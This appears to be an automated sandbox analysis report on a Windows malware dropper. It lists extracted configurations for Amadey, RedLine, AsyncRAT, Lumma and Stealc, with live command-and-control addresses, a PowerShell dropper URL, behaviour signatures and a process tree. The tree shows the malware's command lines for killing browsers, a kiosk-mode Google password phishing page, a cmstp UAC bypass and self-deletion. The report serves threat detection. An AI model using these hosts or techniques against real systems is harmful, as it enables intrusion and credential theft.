Resubmissions

14/12/2024, 15:07

241214-shgy7sxnek 10

14/12/2024, 14:40

241214-r2dkfsvpa1 10

Analysis

  • max time kernel
    49s
  • max time network
    372s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/12/2024, 15:07

General

  • Target

    2da07adfec8e96b42181944d948e346cb54a3772a53e9bd1a219119fca8fa7ea.exe

  • Size

    2.8MB

  • MD5

    2a4b5ab731f10fa8dd68a58dc1144193

  • SHA1

    a1e64fd4e07a9c22333e38bfbe5da47fd4f7d6a2

  • SHA256

    2da07adfec8e96b42181944d948e346cb54a3772a53e9bd1a219119fca8fa7ea

  • SHA512

    6991093dc8d35c4f89bef11e811e323e2f515147548a40b1c21c18a9f4e8209a20bde5e019a507ab10c0112299604c0abc553be9a26fee6bbfabb30e0ae7019c

  • SSDEEP

    49152:DVCS2ZpFbPnpCd4AZZ6OfNq9mr2m9seJG9d+:DkZpFbBCd4YZ6ylr23UG9

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.178/GO.png

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

fvcxcx

C2

185.81.68.147:1912

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

82.64.156.123:80

Mutex

9mzImB3NUR0Q

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://tacitglibbr.biz/api

Extracted

Family

amadey

Version

5.10

Botnet

03013e

C2

http://185.11.61.104

Attributes
  • install_dir

    0d7d65a8fb

  • install_file

    Gxtuum.exe

  • strings_key

    6a02c43bc60cba83349fcb51d95a69ff

  • url_paths

    /7jbBdsS/index.php

rc4.plain

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://tacitglibbr.biz/api

https://immureprech.biz/api

https://deafeninggeh.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Async RAT payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 32 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 44 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3368
    • C:\Users\Admin\AppData\Local\Temp\2da07adfec8e96b42181944d948e346cb54a3772a53e9bd1a219119fca8fa7ea.exe
      "C:\Users\Admin\AppData\Local\Temp\2da07adfec8e96b42181944d948e346cb54a3772a53e9bd1a219119fca8fa7ea.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4724
      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2276
        • C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe
          "C:\Users\Admin\AppData\Local\Temp\1015193001\K6UAlAU.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          PID:3608
          • C:\Windows\system32\svchost.exe
            "C:\Windows\system32\svchost.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:884
          • C:\Windows\system32\msiexec.exe
            "C:\Windows\system32\msiexec.exe"
            5⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2684
          • C:\Windows\system32\audiodg.exe
            "C:\Windows\system32\audiodg.exe"
            5⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1015216041\wOKhy9f.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4820
          • C:\Windows\SysWOW64\ipconfig.exe
            "C:\Windows\system32\ipconfig.exe" /flushdns
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers network information
            PID:5392
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5452
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Roaming\10000090140\S.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:5040
              • C:\Windows\SysWOW64\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /flushdns
                7⤵
                • System Location Discovery: System Language Discovery
                • Gathers network information
                PID:3744
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4240
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Roaming\10000100140\8.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:6864
              • C:\Windows\SysWOW64\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /flushdns
                7⤵
                • System Location Discovery: System Language Discovery
                • Gathers network information
                PID:7480
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                PID:8596
                • \??\c:\windows\SysWOW64\cmstp.exe
                  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\lrworncp.inf
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:8700
        • C:\Users\Admin\AppData\Local\Temp\1015223001\3bbfb806b3.exe
          "C:\Users\Admin\AppData\Local\Temp\1015223001\3bbfb806b3.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:1500
          • C:\Users\Admin\AppData\Local\Temp\1015223001\3bbfb806b3.exe
            "C:\Users\Admin\AppData\Local\Temp\1015223001\3bbfb806b3.exe"
            5⤵
            • Executes dropped EXE
            PID:3076
          • C:\Users\Admin\AppData\Local\Temp\1015223001\3bbfb806b3.exe
            "C:\Users\Admin\AppData\Local\Temp\1015223001\3bbfb806b3.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4048
        • C:\Users\Admin\AppData\Local\Temp\1015224001\3e274914a1.exe
          "C:\Users\Admin\AppData\Local\Temp\1015224001\3e274914a1.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          PID:4240
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1015224001\3e274914a1.exe" & rd /s /q "C:\ProgramData\G47GLNG4OZU3" & exit
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5364
            • C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              6⤵
                PID:5392
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 10
                6⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:5228
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 2028
              5⤵
              • Program crash
              PID:2628
          • C:\Users\Admin\AppData\Local\Temp\1015225001\0e4b706f4e.exe
            "C:\Users\Admin\AppData\Local\Temp\1015225001\0e4b706f4e.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5996
          • C:\Users\Admin\AppData\Local\Temp\1015226001\88bac1669f.exe
            "C:\Users\Admin\AppData\Local\Temp\1015226001\88bac1669f.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:5316
          • C:\Users\Admin\AppData\Local\Temp\1015227001\4f74818fc2.exe
            "C:\Users\Admin\AppData\Local\Temp\1015227001\4f74818fc2.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:2312
          • C:\Users\Admin\AppData\Local\Temp\1015228001\786812f126.exe
            "C:\Users\Admin\AppData\Local\Temp\1015228001\786812f126.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:8184
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:1724
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:9200
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:3532
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:6648
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • Kills process with taskkill
              PID:2340
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
                PID:2316
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  6⤵
                    PID:7940
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5fe7a08-cc4f-4d01-b68c-afd76470235c} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" gpu
                      7⤵
                        PID:8540
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d1ea38-29cd-4673-9b32-9a4ad4279e2d} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" socket
                        7⤵
                          PID:8660
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2764 -childID 1 -isForBrowser -prefsHandle 2804 -prefMapHandle 1596 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64f7e65e-4891-4b85-8cbb-8a55be2a65bb} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                          7⤵
                            PID:9084
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {389a641c-9467-468d-a933-4be86a962337} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                            7⤵
                              PID:6860
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4796 -prefMapHandle 4792 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e42637e-241b-41f6-be91-55653aeccc07} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" utility
                              7⤵
                                PID:4668
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5228 -childID 3 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {661f7929-c763-4a36-90d0-310aa3ac9876} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                7⤵
                                  PID:8148
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5428 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5356 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1852ddc6-40e8-4da4-bb23-481d06bc5b06} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                  7⤵
                                    PID:9192
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4632 -childID 5 -isForBrowser -prefsHandle 5584 -prefMapHandle 5580 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5cd41a6-e12d-4f1d-8fa9-45c7f74c2b7c} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                    7⤵
                                      PID:8648
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3268 -childID 6 -isForBrowser -prefsHandle 3340 -prefMapHandle 3860 -prefsLen 27182 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76c271eb-80e4-4253-8900-630b0a2a9d50} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                      7⤵
                                        PID:6612
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6304 -childID 7 -isForBrowser -prefsHandle 6388 -prefMapHandle 6384 -prefsLen 27182 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f91dd70-a347-49c4-841e-76fae3e01a85} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                        7⤵
                                          PID:8212
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1560 -parentBuildID 20240401114208 -prefsHandle 2972 -prefMapHandle 2968 -prefsLen 29407 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6914e5c3-b25b-4e39-8f1c-7de37da5de21} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" rdd
                                          7⤵
                                            PID:9160
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3372 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 1424 -prefMapHandle 2964 -prefsLen 29407 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1f0b20e-97ce-4ae5-8ca7-87a0dc392dbf} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" utility
                                            7⤵
                                              PID:6996
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 8 -isForBrowser -prefsHandle 3496 -prefMapHandle 1456 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3daff11-0f42-4530-ac28-4bbd7c4fd33d} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                              7⤵
                                                PID:5960
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2844 -childID 9 -isForBrowser -prefsHandle 7028 -prefMapHandle 5940 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0b886d0-3016-43ab-9660-4ade56ef5ef9} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                                7⤵
                                                  PID:4640
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7164 -childID 10 -isForBrowser -prefsHandle 7148 -prefMapHandle 6352 -prefsLen 28048 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {502cb84a-f61a-4e1b-bc25-97de0718fe0b} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                                  7⤵
                                                    PID:6904
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7636 -childID 11 -isForBrowser -prefsHandle 5472 -prefMapHandle 7612 -prefsLen 28292 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86f33533-3f09-4e42-8bf7-48266f7c69e2} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                                    7⤵
                                                      PID:6604
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7636 -childID 12 -isForBrowser -prefsHandle 4128 -prefMapHandle 4132 -prefsLen 28292 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d4f9eb-0e1f-4b40-b853-77a8405c769c} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                                      7⤵
                                                        PID:4788
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7504 -childID 13 -isForBrowser -prefsHandle 7672 -prefMapHandle 7668 -prefsLen 28292 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d67071f7-4494-4961-aca7-e65358afe9ce} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                                        7⤵
                                                          PID:4844
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7272 -childID 14 -isForBrowser -prefsHandle 1880 -prefMapHandle 6908 -prefsLen 28292 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7ce5eef-06c1-4ada-902e-dbe2529a38b5} 7940 "\\.\pipe\gecko-crash-server-pipe.7940" tab
                                                          7⤵
                                                            PID:8456
                                                    • C:\Users\Admin\AppData\Local\Temp\1015229001\fe40133a1f.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1015229001\fe40133a1f.exe"
                                                      4⤵
                                                      • Modifies Windows Defender Real-time Protection settings
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Windows security modification
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      PID:7196
                                                    • C:\Users\Admin\AppData\Local\Temp\1015230001\bdfdb94870.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1015230001\bdfdb94870.exe"
                                                      4⤵
                                                        PID:3656
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                          5⤵
                                                            PID:6232
                                                            • C:\Windows\system32\mode.com
                                                              mode 65,10
                                                              6⤵
                                                                PID:5152
                                                              • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                6⤵
                                                                  PID:9128
                                                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                  7z.exe e extracted/file_7.zip -oextracted
                                                                  6⤵
                                                                    PID:7772
                                                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                    7z.exe e extracted/file_6.zip -oextracted
                                                                    6⤵
                                                                      PID:6892
                                                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                      7z.exe e extracted/file_5.zip -oextracted
                                                                      6⤵
                                                                        PID:4924
                                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                        7z.exe e extracted/file_4.zip -oextracted
                                                                        6⤵
                                                                          PID:1828
                                                                        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                          7z.exe e extracted/file_3.zip -oextracted
                                                                          6⤵
                                                                            PID:5608
                                                                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                            7z.exe e extracted/file_2.zip -oextracted
                                                                            6⤵
                                                                              PID:1640
                                                                            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                                              7z.exe e extracted/file_1.zip -oextracted
                                                                              6⤵
                                                                                PID:6896
